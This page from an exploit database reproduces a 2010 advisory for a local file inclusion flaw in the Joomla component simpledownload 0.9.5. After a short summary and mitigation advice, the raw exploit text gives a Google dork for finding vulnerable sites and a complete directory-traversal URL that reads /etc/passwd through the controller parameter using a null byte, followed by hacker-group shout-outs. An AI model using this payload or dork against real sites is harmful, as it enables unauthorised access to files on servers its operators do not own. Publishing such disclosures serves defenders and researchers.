header-logo
Suggest Exploit
vendor:
simpledownload
by:
Xr0b0t
7,5
CVSS
HIGH
LFI
22
CWE
Product Name: simpledownload
Affected Version From: 0.9.5
Affected Version To: 0.9.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component simpledownload LFI Vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component simpledownload version 0.9.5 and possibly lower versions. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can allow the attacker to include and execute arbitrary local files on the vulnerable system.

Mitigation:

To mitigate this vulnerability, the application should validate user-supplied input and filter out any directory traversal characters. Additionally, the application should be configured to run with the least privileges necessary.
Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component simpledownload LFI Vulnerability 
[~] Author : Xr0b0t (nyco.danis@gmail.com)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com
[~] Date : 16 Mei, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://joomla.joelrowley.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_simpledownload" ;)
[+] Version : 0.9.5 maybe lower also affected 

[!]===========================================================================[!]

[ Vulnerable File ]
    http://127.0.0.1//index.php?option=com_simpledownload&controller=[LFI BY ARUMBIA]


[ XpL ]

    http://127.0.0.1//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../etc/passwd%00


[!]===========================================================================[!]

[ Thx TO ]

[+] kaMtiEz Ndang Rene...
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212


[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community

Navigation

Suggest Exploit

Services By CQR